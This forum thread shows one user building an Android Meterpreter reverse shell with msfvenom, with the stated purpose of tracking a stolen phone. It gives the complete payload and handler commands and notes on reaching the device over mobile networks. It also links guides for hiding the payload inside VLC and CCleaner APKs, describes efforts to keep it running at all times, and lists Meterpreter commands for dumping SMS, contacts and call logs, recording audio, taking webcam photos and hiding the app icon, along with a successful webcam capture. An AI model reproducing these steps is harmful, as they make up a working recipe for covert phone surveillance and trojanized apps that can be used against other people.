# [SOLVED] android metasploit

## niceflower

hello i have a question about a piece of software crafted with the metasploit framework,

it runs fine, only downside is that when the android phone goes into, idle, the meterpreter seems to die, and the only way to restart it, is by launching the payload icon on the android phone again.

for a free payload it does include cool features, however i can not seem to get the meterpreter consistent.

any ideas?

msfconsole:

the payload is called: msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT = 444 r > name.apk

payload is set with:

```
set PAYLOAD android/meterpreter/reverse_tcp
```

it would be nice to have a consistent connection to my phone so i can track if it gets stolen, using google maps.

i know little about who made this payload into the metasploit framework, or if anyone else knows something about it.

*edit* only way i can seem to start the meterpreter is by pressing the icon on the phone  :Sad: 

the solution would be to make the .apk auto run each time after idle, or even better make it auto run 24/7

i just checked the same payload on my galaxy tab 3, and there the meterpreter stays consistent even when on idle,

so the problem is related to my Huawei p8 phone.Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total

----------

## niceflower

ok i found it: about the huawei P8 instead of creating tcp:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk
```

*to make the payload work outside the lan network for example with 4G mobile network, just use LHOST=your external public ip, and then to start the meterpreter set LHOST=your internal boxen ip

i used http:

```
msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk
```

then to start msfconsole:

```
msfconsole

use multi/handler

set PAYLOAD android/meterpreter/reverse_http

set LHOST (put ip here)

set LPORT 4444

exploit

?
```

when closing down metasploit, and restarting, there is actually no interaction needed with the android device to start a new meterpreter shell.

only downside for now, is that the reverse_http payload can not take webcam snap, stream, wlan_geolocate and some other features, when the telephone is on idle, 

however this is not a real concern at this moment for me.

last edit*

i just noticed a wakelock option so everything is working on idle too now with the reverse_http payload on port 4444

sorry for being a bit Gentoo off-topic

----------

## niceflower

Hello !

i explored my android metasploit project, and noticed that is was possible to build in the PAYLOAD into VLC.apk (video lan) and ccleaner.apk (a tool to clean up a phone)

these websites can be very usefull on how to embed the compromised .apk into any existing .apk:

https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/

i can say it works and vlc is running on my huawei P8 now these are some commands from the meterpreter shell on my Kali Rolling Live:

the wakelock command is a bit bugged, and keeping the meterpreter consistent is art.

i have tried to look into creating a service in the vlc.apk with Android Studio Linux: i am stuck on how to create the service hook at this point, to let it run 24/7.

the problem seems still that the meterpreter shell dies over time  :Sad: 

*edit*

 this proves how important it is to  "not allow app from untrusted source"  turned on in Android, because any .apk from untrusted source, can be manipulated.

```
meterpreter > ?

Stdapi: File system Commands

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    checksum      Retrieve the checksum of a file

    cp            Copy source to destination

    dir           List files (alias for ls)

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    mv            Move source to destination

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands

===========================

    Command       Description

    -------       -----------

    ifconfig      Display interfaces

    ipconfig      Display interfaces

    portfwd       Forward a local port to a remote service

    route         View and modify the routing table

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command

    getuid        Get the user that the server is running as

    localtime     Displays the target system's local date and time

    pgrep         Filter processes by name

    ps            List running processes

    shell         Drop into a system command shell

    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands

=======================

    Command        Description

    -------        -----------

    record_mic     Record audio from the default microphone for X seconds

    webcam_chat    Start a video chat

    webcam_list    List webcams

    webcam_snap    Take a snapshot from the specified webcam

    webcam_stream  Play a video stream from the specified webcam

Android Commands

================

    Command           Description

    -------           -----------

    activity_start    Start an Android activity from a Uri string

    check_root        Check if device is rooted

    dump_calllog      Get call log

    dump_contacts     Get contacts list

    dump_sms          Get sms messages

    geolocate         Get current lat-long using geolocation

    hide_app_icon     Hide the app icon from the launcher

    interval_collect  Manage interval collection capabilities

    send_sms          Sends SMS from target session

    set_audio_mode    Set Ringer Mode

    sqlite_query      Query a SQLite database from storage

    wakelock          Enable/Disable Wakelock

    wlan_geolocate    Get current lat-long using WLAN information

meterpreter > webcam_snap

[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.

meterpreter > webcam_snap

[*] Starting...

[+] Got frame

[*] Stopped

Webcam shot saved to: /root/OuZRSbmh.jpeg

meterpreter > 

```

----------

